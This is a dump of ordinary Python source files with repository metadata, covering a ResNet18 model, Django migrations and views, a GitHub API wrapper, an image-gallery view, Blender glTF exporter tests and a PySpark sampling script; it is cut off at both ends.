        if any(s in key for s in ['.num_batches_tracked', ] + skip):
            continue

        #print('\t\t', key)
        if is_print:
            print('\t\t', '%-48s %-24s <--- %-32s %-24s' % (
                key, str(state_dict[key].shape),
                pretrain_key, str(pretrain_state_dict[pretrain_key].shape),
            ))

        i = i + 1
        state_dict[key] = pretrain_state_dict[pretrain_key]

    net.load_state_dict(state_dict)
    print('')
    print('len(pretrain_state_dict.keys()) = %d' % len(pretrain_state_dict.keys()))
    print('len(state_dict.keys())          = %d' % len(state_dict.keys()))
    print('loaded = %d' % i)
    print('')


###############################################################################
class ConvBn2d(nn.Module):
    def __init__(self, in_channel, out_channel, kernel_size=3, padding=1, stride=1):
        super(ConvBn2d, self).__init__()
        self.conv = nn.Conv2d(in_channel, out_channel, kernel_size=kernel_size,
                              padding=padding, stride=stride, bias=False)
        self.bn = nn.BatchNorm2d(out_channel, eps=1e-5)

    def forward(self, x):
        x = self.conv(x)
        x = self.bn(x)
        return x


############# resnext50 pyramid feature net #######################################
# https://github.com/Hsuxu/ResNeXt/blob/master/models.py
# https://github.com/D-X-Y/ResNeXt-DenseNet/blob/master/models/resnext.py
# https://github.com/miraclewkf/ResNeXt-PyTorch/blob/master/resnext.py

# bottleneck type C
class BasicBlock(nn.Module):
    def __init__(self, in_channel, channel, out_channel, stride=1, is_shortcut=False):
        super(BasicBlock, self).__init__()
        self.is_shortcut = is_shortcut

        self.conv_bn1 = ConvBn2d(in_channel, channel, kernel_size=3, padding=1, stride=stride)
        self.conv_bn2 = ConvBn2d(channel, out_channel, kernel_size=3, padding=1, stride=1)

        if is_shortcut:
            self.shortcut = ConvBn2d(in_channel, out_channel, kernel_size=1, padding=0, stride=stride)

    def forward(self, x):
        z = F.relu(self.conv_bn1(x), inplace=True)
        z = self.conv_bn2(z)

        if self.is_shortcut:
            x = self.shortcut(x)

        z += x
        z = F.relu(z, inplace=True)
        return z


#resnet18
class ResNet18(nn.Module):

    def __init__(self, num_class=1000):
        super(ResNet18, self).__init__()

        self.block0 = nn.Sequential(
            nn.Conv2d(3, 64, kernel_size=7, padding=3, stride=2, bias=False),
            BatchNorm2d(64),
            nn.ReLU(inplace=True),
        )
        self.block1 = nn.Sequential(
            nn.MaxPool2d(kernel_size=3, padding=1, stride=2),
            BasicBlock(64, 64, 64, stride=1, is_shortcut=False,),
            *[BasicBlock(64, 64, 64, stride=1, is_shortcut=False,) for i in range(1, 2)],
        )
        self.block2 = nn.Sequential(
            BasicBlock(64, 128, 128, stride=2, is_shortcut=True, ),
            *[BasicBlock(128, 128, 128, stride=1, is_shortcut=False,) for i in range(1, 2)],
        )
        self.block3 = nn.Sequential(
            BasicBlock(128, 256, 256, stride=2, is_shortcut=True, ),
            *[BasicBlock(256, 256, 256, stride=1, is_shortcut=False,) for i in range(1, 2)],
        )
        self.block4 = nn.Sequential(
            BasicBlock(256, 512, 512, stride=2, is_shortcut=True, ),
            *[BasicBlock(512, 512, 512, stride=1, is_shortcut=False,) for i in range(1, 2)],
        )
        self.logit = nn.Linear(512, num_class)

    def forward(self, x):
        batch_size = len(x)

        x = self.block0(x)
        x = F.max_pool2d(x, kernel_size=3, padding=1, stride=2, ceil_mode=False)
        x = self.block1(x)
        x = self.block2(x)
        x = self.block3(x)
        x = self.block4(x)
        x = F.adaptive_avg_pool2d(x, 1).reshape(batch_size, -1)
        logit = self.logit(x)
        return logit


# main #################################################################
if __name__ == '__main__':
    print('%s: calling main function ... ' % os.path.basename(__file__))

    net = ResNet18()
    load_pretrain(net, is_print=True)

    #---
    if 0:
        print(net)
        print('')

        print('*** print key *** ')
        state_dict = net.state_dict()
        keys = list(state_dict.keys())
        #keys = sorted(keys)
        for k in keys:
            if any(s in k for s in [
                'num_batches_tracked'
                # '.kernel',
                # '.gamma',
                # '.beta',
                # '.running_mean',
                # '.running_var',
            ]):
                continue

            p = state_dict[k].data.cpu().numpy()
            print(' \'%s\',\t%s,' % (k, tuple(p.shape)))
        print('')
        exit(0)

    #---
    if 1:
        #IMAGE_RGB_MEAN = [0.485, 0.456, 0.406]
        #IMAGE_RGB_STD = [0.229, 0.224, 0.225]

        net = net.cuda().eval()

        image_dir = '/root/share/data/imagenet/dummy/256x256'
        for f in [
            'great_white_shark', 'screwdriver', 'ostrich', 'blad_eagle', 'english_foxhound', 'goldfish',
        ]:
            image_file = image_dir + '/%s.jpg' % f
            image = cv2.imread(image_file, cv2.IMREAD_COLOR)
            image = cv2.resize(image, dsize=(224, 224))
            #image = image[16:16+224, 16:16+224]

            image = image[:, :, ::-1]
            image = (image.astype(np.float32) / 255 - IMAGE_RGB_MEAN) / IMAGE_RGB_STD
            input = image.transpose(2, 0, 1)
            input = torch.from_numpy(input).float().cuda().unsqueeze(0)

            logit = net(input)
            probability = F.softmax(logit, -1)

            probability = probability.data.cpu().numpy().reshape(-1)
            argsort = np.argsort(-probability)

            print(f, image.shape)
            print(probability[:5])
            for t in range(5):
                print(t, '%5d' % argsort[t], probability[argsort[t]])
            print('')

        pass

    print('\nsuccess!')

##############################################################################
'''
great_white_shark (224, 224, 3)
[9.4850137e-09 1.0241954e-10 6.3554895e-01 3.6209035e-01 7.0319895e-04]
0     2 0.63554895
1     3 0.36209035
2     4 0.00070319895
3   391 0.0006877669
4   394 0.0005033317

screwdriver (224, 224, 3)
[7.5342734e-07 8.0605433e-10 3.7223426e-08 3.4161702e-09 3.0139031e-09]
0   784 0.97836363
1   845 0.017194362
2   418 0.0009959626
3   744 0.0008223861
4   657 0.0006719876

ostrich (224, 224, 3)
[2.2530783e-11 6.3119941e-13 1.6578347e-10 7.2425117e-12 1.0529154e-11]
0     9 0.6178599
1   135 0.37783644
2   127 0.0022111784
3   128 0.00069762324
4   138 0.00046368755

blad_eagle (224, 224, 3)
[4.1533657e-14 1.6096601e-12 7.0071298e-16 9.8058961e-16 9.9926985e-17]
0    22 0.9502171
1    21 0.049710903
2    93 5.8040747e-05
3   135 1.1641874e-05
4   146 8.518575e-07

english_foxhound (224, 224, 3)
[3.3760391e-17 1.9117241e-11 2.1513479e-12 2.5913074e-15 4.0416227e-13]
0   167 0.8951152
1   166 0.07485257
2   215 0.014488099
3   218 0.011066306
4   162 0.004281139

goldfish (224, 224, 3)
[1.8774564e-13 9.9999976e-01 8.1598264e-17 2.6006566e-16 2.0891524e-16]
0     1 0.99999976
1    90 1.4076785e-07
2    88 1.1558041e-07
3   130 9.544082e-09
4    94 4.6506425e-09
'''
19c036b8c37c66b0214ccbfc8b7a4c13c90935d2
87402fcec35a35a45dc305588323c72fa3d203b0
/tasks/migrations/0022_auto_20200925_1348.py
30bef7017d73304f6deadfa32abf64fe1e491aa8
[]
no_license
Aviemusca/task-manager-backend
d80fd20a5aa88a31f5096d17c3ee1ebe86832c7e
b0a9052d94138f4e7d2c1be7f7425ee570f9eec4
refs/heads/master
2022-12-20T10:06:16.648889
2020-09-29T10:31:33
2020-09-29T10:31:33
278,863,723
0
0
null
null
null
null
UTF-8
Python
false
false
449
py
# Generated by Django 3.0.8 on 2020-09-25 13:48

import datetime
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('tasks', '0021_auto_20200907_1043'),
    ]

    operations = [
        migrations.AlterField(
            model_name='task',
            name='deadline',
            field=models.DateTimeField(default=datetime.datetime(2020, 10, 2, 13, 47, 57, 676103)),
        ),
    ]
9a92c56ebf23abfd32e027a9bee74caebb691d5d
f74dd098c3e665d8f605af5ebe7e2874ac31dd2f
/aiogithubapi/objects/repository/release.py
61c880ab667788e696a65c262a1162a9b0c98748
[ "MIT" ]
permissive
ludeeus/aiogithubapi
ce87382698827939aaa127b378b9a11998f13c06
90f3fc98e5096300269763c9a5857481b2dec4d2
refs/heads/main
2023-08-20T19:30:05.309844
2023-08-14T20:24:21
2023-08-14T20:24:21
198,505,021
21
20
MIT
2023-09-11T06:12:10
2019-07-23T20:39:53
Python
UTF-8
Python
false
false
986
py
""" AIOGitHubAPI: Repository Release https://developer.github.com/v3/repos/releases/ """ # pylint: disable=missing-docstring from datetime import datetime from ...objects.base import AIOGitHubAPIBase from ...objects.repository.content import AIOGitHubAPIRepositoryContent class AIOGitHubAPIRepositoryRelease(AIOGitHubAPIBase): """Repository Release GitHub API implementation.""" @property def tag_name(self): return self.attributes.get("tag_name") @property def name(self): return self.attributes.get("name") @property def published_at(self): return datetime.strptime(self.attributes.get("published_at"), "%Y-%m-%dT%H:%M:%SZ") @property def draft(self): return self.attributes.get("draft") @property def prerelease(self): return self.attributes.get("prerelease") @property def assets(self): return [AIOGitHubAPIRepositoryContent(x) for x in self.attributes.get("assets", [])]
b961193349a8103c8c431616e1dd217e33b4484d
0fef5d75b0896116eda121c4d7c8a4ad6686a0f7
/kotti_image_gallery/views.py
aca92925141697899cbe39251257bae08515e3ba
[]
no_license
disko/kotti_image_gallery
1144d06f31f3d07f759b73d88a066730bc0ed920
046d127effdf3774cf0c1b04f2ef599e6134becb
HEAD
2016-09-06T05:11:24.588627
2012-06-20T09:10:36
2012-06-20T09:10:36
4,111,810
0
1
null
null
null
null
UTF-8
Python
false
false
4,719
py
# -*- coding: utf-8 -*-

import PIL
from kotti import DBSession
from kotti.util import _
from kotti.views.edit import ContentSchema, make_generic_add, make_generic_edit
from kotti.views.file import AddFileFormView, EditFileFormView
from kotti_image_gallery import image_scales
from kotti_image_gallery.resources import Gallery, Image
from plone.scale.scale import scaleImage
from pyramid.response import Response
from pyramid.view import view_config

PIL.ImageFile.MAXBLOCK = 33554432


class GallerySchema(ContentSchema):
    pass


class BaseView(object):

    def __init__(self, context, request):
        self.context = context
        self.request = request


class GalleryView(BaseView):

    @view_config(context=Gallery,
                 name='view',
                 permission='view',
                 renderer='templates/gallery-view.pt')
    def view(self):
        session = DBSession()
        query = session.query(Image).filter(Image.parent_id==self.context.id).order_by(Image.position)
        images = query.all()
        return {"images": images}


class EditImageFormView(EditFileFormView):
    pass


class AddImageFormView(AddFileFormView):

    item_type = _(u"Image")

    def add(self, **appstruct):
        buf = appstruct['file']['fp'].read()
        return Image(title=appstruct['title'],
                     description=appstruct['description'],
                     data=buf,
                     filename=appstruct['file']['filename'],
                     mimetype=appstruct['file']['mimetype'],
                     size=len(buf), )


class ImageView(BaseView):

    @view_config(context=Image,
                 name='view',
                 permission='view',
                 renderer='templates/image-view.pt')
    def view(self):
        return {}

    @view_config(context=Image,
                 name="image",
                 permission='view')
    def image(self):
        """return the image in a specific scale, either inline (default) or as attachment"""
        subpath = list(self.request.subpath)
        if (len(subpath) > 0) and (subpath[-1] == "download"):
            disposition = "attachment"
            subpath.pop()
        else:
            disposition = "inline"

        if len(subpath) == 1:
            scale = subpath[0]
            if scale in image_scales:
                # /path/to/image/scale/thumb
                width, height = image_scales[scale]
            else:
                # /path/to/image/scale/160x120
                try:
                    width, height = [int(v) for v in scale.split("x")]
                except ValueError:
                    width, height = (None, None)
        elif len(subpath) == 2:
            # /path/to/image/scale/160/120
            try:
                width, height = [int(v) for v in subpath]
            except ValueError:
                width, height = (None, None)
        else:
            # don't scale at all
            width, height = (None, None)

        if width and height:
            image, format, size = scaleImage(self.context.data,
                                             width=width,
                                             height=height,
                                             direction="thumb")
        else:
            image = self.context.data

        res = Response(
            headerlist=[('Content-Disposition', '%s;filename="%s"' % (
                            disposition,
                            self.context.filename.encode('ascii', 'ignore'))),
                        ('Content-Length', str(len(image))),
                        ('Content-Type', str(self.context.mimetype)), ],
            app_iter=image)
        return res


def includeme(config):
    config.add_static_view('static-kotti_image_gallery', 'kotti_image_gallery:static')
    config.scan("kotti_image_gallery")

    config.add_view(AddImageFormView,
                    name=Image.type_info.add_view,
                    permission='add',
                    renderer='kotti:templates/edit/node.pt', )

    config.add_view(EditImageFormView,
                    context=Image,
                    name='edit',
                    permission='edit',
                    renderer='kotti:templates/edit/node.pt', )

    config.add_view(make_generic_edit(GallerySchema()),
                    context=Gallery,
                    name='edit',
                    permission='edit',
                    renderer='kotti:templates/edit/node.pt', )

    config.add_view(make_generic_add(GallerySchema(), Gallery),
                    name=Gallery.type_info.add_view,
                    permission='add',
                    renderer='kotti:templates/edit/node.pt', )
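For reference, a standalone sketch of the scale-subpath protocol implemented by ImageView.image above; the image_scales dict here is a stand-in for the real mapping imported from the package:

# Standalone sketch of the scale-subpath parsing; the 'thumb' entry is assumed.
image_scales = {"thumb": (128, 128)}

def parse_scale(subpath):
    if subpath and subpath[-1] == "download":   # trailing marker -> attachment
        subpath = subpath[:-1]
    if len(subpath) == 1:                       # /image/thumb or /image/160x120
        if subpath[0] in image_scales:
            return image_scales[subpath[0]]
        try:
            width, height = [int(v) for v in subpath[0].split("x")]
            return (width, height)
        except ValueError:
            return (None, None)
    elif len(subpath) == 2:                     # /image/160/120
        try:
            width, height = [int(v) for v in subpath]
            return (width, height)
        except ValueError:
            return (None, None)
    return (None, None)                         # /image -> original size

print(parse_scale(["thumb"]))       # (128, 128)
print(parse_scale(["160x120"]))     # (160, 120)
print(parse_scale(["160", "120"]))  # (160, 120)
print(parse_scale([]))              # (None, None)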
a4119ba39b831d8757ef26706cf178071762301f
9f1a56cbf621b34f539b64e526f00f68423a235a
/zigida/apps/db/accounting/items/migrations/0001_initial.py
ff2e312708e73881e78622e43232fdf8253ba8b9
[]
no_license
JacobSima/zando
21d982b190a719982bd5648ac135fbfbe45dbf00
e6fcac1ce97796d1dea5104f1b73bbf9b8822b98
refs/heads/main
2023-06-15T03:51:52.846591
2021-07-12T10:52:25
2021-07-12T10:52:25
385,208,981
0
0
null
null
null
null
UTF-8
Python
false
false
2,226
py
# Generated by Django 3.2.4 on 2021-07-06 15:56

import django.core.validators
from django.db import migrations, models
import uuid
import zigida.core.utils


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Item',
            fields=[
                ('datetime_created', models.DateTimeField(auto_now_add=True, verbose_name='DATE CREATED')),
                ('datetime_updated', models.DateTimeField(auto_now=True, verbose_name='DATE UPDATED')),
                ('last_updated_by', models.CharField(blank=True, max_length=50, null=True, verbose_name='LAST UPDATED BY')),
                ('bool_deleted', models.BooleanField(default=False, verbose_name='IS DELETED?')),
                ('uuid_code', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, verbose_name='ID')),
                ('token_key', models.UUIDField(blank=True, default=uuid.uuid4, editable=False, null=True, verbose_name='TOKEN')),
                ('code', models.CharField(default=zigida.core.utils.item_randcode_gen, max_length=100, verbose_name='CODE')),
                ('quantity', models.PositiveSmallIntegerField(blank=True, default=1, null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(999)], verbose_name='QUANTITY')),
                ('price_buy', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE BUY')),
                ('price_buy_original', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE BUY ORIGINAL')),
                ('price_sell', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE SELL')),
                ('price_sell_original', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE SELL ORIGINAL')),
                ('bool_active', models.BooleanField(default=True, verbose_name='IS ACTIVE')),
            ],
            options={
                'verbose_name_plural': 'items',
                'db_table': 'items',
            },
        ),
    ]
d0dac47833468b6340e44046570fe50b20cf344b
6d5545faf2af0a6bb565ad698bb824110b40e121
/WEBAPP/MLmodel/inception_client.py.runfiles/org_tensorflow/tensorflow/contrib/distributions/python/ops/relaxed_bernoulli.py
2d4ef07a06f25969cc7017d174db5616a93b3e04
[ "MIT" ]
permissive
sunsuntianyi/mlWebApp_v2
abb129cd43540b1be51ecc840127d6e40c2151d3
5198685bf4c4e8973988722282e863a8eaeb426f
refs/heads/master
2021-06-23T22:02:38.002145
2020-11-20T02:17:43
2020-11-20T02:17:43
162,194,249
1
0
null
null
null
null
UTF-8
Python
false
false
152
py
/private/var/tmp/_bazel_tianyi/f29d1e61689e4e4b318f483932fff4d0/external/org_tensorflow/tensorflow/contrib/distributions/python/ops/relaxed_bernoulli.py
7999c9e767ff7ebde5862e9be1c8e6c2ba746d76
0e1e643e864bcb96cf06f14f4cb559b034e114d0
/Exps_7_v3/doc3d/Ablation3_Pyr_ch016_ep010_noFocus/step10_b1_train.py
3aaadbfa5d58d8ec98b4c4672a778cf2dced46a2
[]
no_license
KongBOy/kong_model2
33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307
1af20b168ffccf0d5293a393a40a9fa9519410b2
refs/heads/master
2022-10-14T03:09:22.543998
2022-10-06T11:33:42
2022-10-06T11:33:42
242,080,692
3
0
null
null
null
null
UTF-8
Python
false
false
4,653
py
#############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### Add kong_model2 to sys.path
import os
code_exe_path = os.path.realpath(__file__)  ### path of the currently running step10_b.py
code_exe_path_element = code_exe_path.split("\\")  ### split the path; next we find which level kong_model2 sits at
kong_layer = code_exe_path_element.index("kong_model2")  ### find which level kong_model2 sits at
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1])  ### locate the dir of kong_model2
import sys  ### add kong_model2 to sys.path
sys.path.append(kong_model2_dir)
# print(__file__.split("\\")[-1])
# print("   code_exe_path:", code_exe_path)
# print("   code_exe_path_element:", code_exe_path_element)
# print("   kong_layer:", kong_layer)
# print("   kong_model2_dir:", kong_model2_dir)
###############################################################################################################################################################################################################
# When run with F5, if we are not inside step10_b.py's folder, switch there automatically so that step10_a.py can be imported!
code_exe_dir = os.path.dirname(code_exe_path)  ### dir of the currently running step10_b.py
if(os.getcwd() != code_exe_dir):  ### if we are not inside step10_b.py's folder, switch there automatically
    os.chdir(code_exe_dir)
# print("current_path:", os.getcwd())
###############################################################################################################################################################################################################
### All commands are collected in one place here
from step10_c_exp_command import *
######################################################################################################################
import subprocess as sb

### I_w_M_to_C 3UNet/wiDiv/woDiv %& FL/FM/NL/NM
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L5__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L5__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L6__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L6__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L7__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L7__woD_L__Full_Less_in_have_bg .{train}"])

### W_w_M_to_C woDiv
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L5__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L5__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L6__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L6__woD_L__Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L7__woD_L__Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L7__woD_L__Full_Less_in_have_bg .{train}"])

##### Train jointly
### 4. woD_L woD_L (remember to set woD_L's seperate to False); test this one second
# This one unexpectedly turned out even better; I want to see how well it can do
# sb.run(cmd_python_step10_a + [f"exp_L5_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L5_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L6_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L6_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L7_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"])
# sb.run(cmd_python_step10_a + [f"exp_L7_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"])
6337e2499c6fa0da29ea130222d938fa6a36f58a
528f910908885c3ded4ecc6380b9603c8dcacbd6
/tbapi/top/api/rest/SimbaRptCustbaseGetRequest.py
c9d9394a3214923195d5a87283bd2c0146389272
[]
no_license
Monica-ckd/data007
15fe9c4c898a51a58100138b6b064211199d2ed1
0e54ae57eb719b86ec14ce9f77b027882a3398a8
refs/heads/master
2023-03-16T05:26:14.257318
2016-05-25T06:57:05
2016-05-25T06:57:05
null
0
0
null
null
null
null
UTF-8
Python
false
false
464
py
'''
Created by auto_sdk on 2013-04-01 16:44:41
'''
from top.api.base import RestApi


class SimbaRptCustbaseGetRequest(RestApi):
    def __init__(self, domain='gw.api.taobao.com', port=80):
        RestApi.__init__(self, domain, port)
        self.end_time = None
        self.nick = None
        self.page_no = None
        self.page_size = None
        self.source = None
        self.start_time = None
        self.subway_token = None

    def getapiname(self):
        return 'taobao.simba.rpt.custbase.get'
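A usage sketch following the usual auto-generated TOP SDK pattern; everything beyond the class defined above (credentials and the execution call) is assumed, not shown in this file:

# Illustrative only: the execution plumbing is assumed from the TOP SDK pattern.
req = SimbaRptCustbaseGetRequest()
req.nick = 'example-seller'   # hypothetical seller nick
req.start_time = '2013-03-01'
req.end_time = '2013-03-31'
req.page_no = 1
req.page_size = 200
# resp = req.getResponse()    # would invoke taobao.simba.rpt.custbase.get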
a66ad8b37efa20112165adcc07b03e6251140a84
7a5576a22774c8e36830781a845c0ac39243af99
/tests/unit/test_image.py
e26427a2f2abfd00f2f1968405b9a41875cc1403
[ "Apache-2.0" ]
permissive
Kupoman/blendergltf
1ccece9793005c57683baf6cfd50cadb7ff303c0
cd665283e5fce6447abba22dfd9f584c602a1782
refs/heads/develop
2022-07-04T06:04:04.535191
2019-06-16T01:32:40
2019-06-16T02:21:09
51,494,812
353
60
Apache-2.0
2020-05-30T14:29:18
2016-02-11T04:53:55
Python
UTF-8
Python
false
false
2,570
py
def test_image_export_reference(exporters, state, bpy_image_default, gltf_image_default):
    state['settings']['images_data_storage'] = 'REFERENCE'
    gltf_image_default['uri'] = '../filepath.png'

    output = exporters.ImageExporter.export(state, bpy_image_default)
    assert output == gltf_image_default


def test_image_export_embed(exporters, state, bpy_image_default, gltf_image_default):
    state['settings']['images_data_storage'] = 'EMBED'
    gltf_image_default['uri'] = (
        'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACElEQVR42gMAAAAAAW'
        '/dyZEAAAAASUVORK5CYII='
    )
    gltf_image_default['mimeType'] = 'image/png'

    output = exporters.ImageExporter.export(state, bpy_image_default)
    assert output == gltf_image_default


def test_image_export_embed_glb(exporters, state, bpy_image_default, gltf_image_default):
    state['settings']['images_data_storage'] = 'EMBED'
    state['settings']['gltf_export_binary'] = True
    gltf_image_default['mimeType'] = 'image/png'
    gltf_image_default['bufferView'] = 'bufferView_buffer_Image_0'

    output = exporters.ImageExporter.export(state, bpy_image_default)
    for ref in state['references']:
        ref.source[ref.prop] = ref.blender_name
    assert output == gltf_image_default


def test_image_to_data_uri(exporters, bpy_image_default):
    image_data = (
        b'\x89PNG\r\n\x1a\n\x00\x00\x00\r'
        b'IHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\x08'
        b'IDATx\xda\x03\x00\x00\x00\x00\x01o\xdd\xc9\x91\x00\x00\x00\x00'
        b'IEND\xaeB`\x82'
    )
    assert exporters.ImageExporter.image_to_data_uri(bpy_image_default) == image_data


def test_image_check(exporters, state, bpy_image_default):
    assert exporters.ImageExporter.check(state, bpy_image_default)


def test_image_default(exporters, state, bpy_image_default):
    assert exporters.ImageExporter.default(state, bpy_image_default) == {
        'name': 'Image',
        'uri': '',
    }


def test_image_check_0_x(exporters, state, bpy_image_default):
    bpy_image_default.size = [0, 1]
    assert exporters.ImageExporter.check(state, bpy_image_default) is not True


def test_image_check_0_y(exporters, state, bpy_image_default):
    bpy_image_default.size = [1, 0]
    assert exporters.ImageExporter.check(state, bpy_image_default) is not True


def test_image_check_type(exporters, state, bpy_image_default):
    bpy_image_default.type = 'NOT_IMAGE'
    assert exporters.ImageExporter.check(state, bpy_image_default) is not True
79609da4ebb7b41e9546575df82cac770fc8e609
3c541cf9d6956f580eb6fec039e567d0813ee272
/apps/recipes/views/recipes.py
8ea96fb3baf2507cfcc458eceef1f76889e0aaa4
[]
no_license
NicolasTerroni/MyFridgeAPI
9c4a7b28f48d9c547b82bc45348a4a2bd58d8551
5cd1b3155c4542d0479948f39701b539497e28f7
refs/heads/main
2023-07-01T03:05:09.422293
2021-08-10T04:10:44
2021-08-10T04:10:44
382,104,468
0
0
null
null
null
null
UTF-8
Python
false
false
2,893
py
"""Recipes views.""" # Django REST Framework from rest_framework.viewsets import ModelViewSet from rest_framework.decorators import action from rest_framework.response import Response # Serializers from apps.recipes.serializers import RecipeModelSerializer, CreateRecipeSerializer # Models from apps.recipes.models import Recipe # Permissions from rest_framework.permissions import IsAuthenticated from apps.recipes.permissions import IsRecipeOwner # Utilities from collections import Counter class RecipesViewSet(ModelViewSet): """Recipes viewset.""" queryset = Recipe.objects.all() lookup_field = 'slug_name' def get_permissions(self): """Assign permissions based on action.""" permissions = [IsAuthenticated,] if self.action in ['update','partial_update','destroy']: permissions.append(IsRecipeOwner) return [permission() for permission in permissions] def get_serializer_class(self): """Return serializer class based on action.""" if self.action == "create": return CreateRecipeSerializer else: return RecipeModelSerializer @action(detail=False) def possible_recipes(self, request): """Returns recipes that contain at least one of the ingredients from the user's fridge.""" # Get user fridge's ingredients fridge_ingredients_queryset = request.user.fridge.ingredients.all() # Transform the queryset into a list fridge_ingredients = [i for i in fridge_ingredients_queryset] # Get recipes that contain at least one of the ingredients from the user's fridge queryset = Recipe.objects.filter(ingredients__in=fridge_ingredients) # This will append to the queryset a recipe instance for each ingredient that matches. # Now order by most repeated recipes in the queryset and remove the repeated recipe instances. counts = Counter(queryset) queryset = sorted(counts, key=counts.get, reverse=True) # Pagination page = self.paginate_queryset(queryset) if page is not None: serializer = self.get_serializer(page, many=True) return self.get_paginated_response(serializer.data) serializer = self.get_serializer(queryset, many=True) return Response(serializer.data) @action(detail=False) def my_recipes(self, request): """List the requesting user recipes.""" queryset = Recipe.objects.filter(created_by=request.user) # Pagination page = self.paginate_queryset(queryset) if page is not None: serializer = self.get_serializer(page, many=True) return self.get_paginated_response(serializer.data) serializer = self.get_serializer(queryset, many=True) return Response(serializer.data)
be134015a3d29b2e9234fc1baf05fbb8b076fb41
fcd2ece104f3c5ade822fd8b6ae35e3dd48e35b1
/code/2-twitter_labor/1-training_data_preparation/preliminary/ngram_labeling/build_set_specificity_check.py
54d4e9a89780968a89e234a79ce889fe5ec87f76
[]
no_license
spfraib/twitter
975742c9090b628ade0ec7230d0a9f09ab6e5d4a
da2104d30d094d5f943a057f5c1df902c2254d4d
refs/heads/master
2023-06-22T08:37:22.523478
2022-12-30T17:49:33
2022-12-30T17:49:33
236,588,781
6
4
null
2023-06-12T21:28:41
2020-01-27T20:34:53
Jupyter Notebook
UTF-8
Python
false
false
1,488
py
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
from pyspark.ml.feature import Bucketizer, QuantileDiscretizer
from pyspark.sql import Window
from pyspark.sql.types import *
from pyspark.sql.functions import lower, col, lit
import subprocess
import argparse
import os
import unicodedata
import sys
from pyspark.sql.functions import translate, regexp_replace
from pyspark.sql.types import StringType
from pyspark.sql.functions import udf

try:
    spark
except NameError:
    spark = SparkSession.builder.appName("").getOrCreate()

if __name__ == "__main__":
    df_sample_1000 = spark.read.parquet('/user/mt4493/twitter/ngram_samples/US/sample_1000')
    df_sample_new_1000 = spark.read.parquet('/user/mt4493/twitter/ngram_samples/US/sample_new_1000')
    df = df_sample_1000.union(df_sample_new_1000)
    df = df.withColumn('text', regexp_replace('text', '\\', ' '))
    dropped_ngrams_list = ['i_fired', 'firedme', 'i_unemployed', 'i_jobless', 'i_not_working']
    df = df.filter(~df.ngram.isin(dropped_ngrams_list))
    f = df.groupby('ngram').count()
    f = f.withColumn('frac', F.when(col('count') < 20, 1).otherwise(20 / col('count')))
    frac_dict = dict(f.select('ngram', 'frac').collect())
    df_sampled = df.sampleBy('ngram', fractions=frac_dict)
    df_sampled = df_sampled.select('tweet_id', 'text', 'ngram')
    df_sampled.coalesce(1).write.mode("overwrite").option("header", "true").csv(
        '/user/mt4493/twitter/ngram_samples/US/specificity_check')
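# --- Editor's note (added; not part of the original file): the per-ngram
# fractions computed above cap each group at roughly 20 sampled rows. The same
# arithmetic in plain Python, on hypothetical counts:
if __name__ == "__main__":
    counts = {'i_lost_my_job': 8, 'unemployed': 500}
    fracs = {k: 1 if c < 20 else 20 / c for k, c in counts.items()}
    assert fracs == {'i_lost_my_job': 1, 'unemployed': 0.04}
    # sampleBy() then keeps every row of the small group and ~4% of the large
    # one; Spark's sampleBy is probabilistic, so the cap is approximate.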
ddbef986dae907d2050b594e370f2184388f1920
e7c70a02e61f6d4a97c5933f3550bca22afa6acb
/ros_ws/build/learning_ros/Part_1/custom_msgs/cmake/custom_msgs-genmsg-context.py
cdf5cb754534d19022baa9bb108ca94f21ca075e
[]
no_license
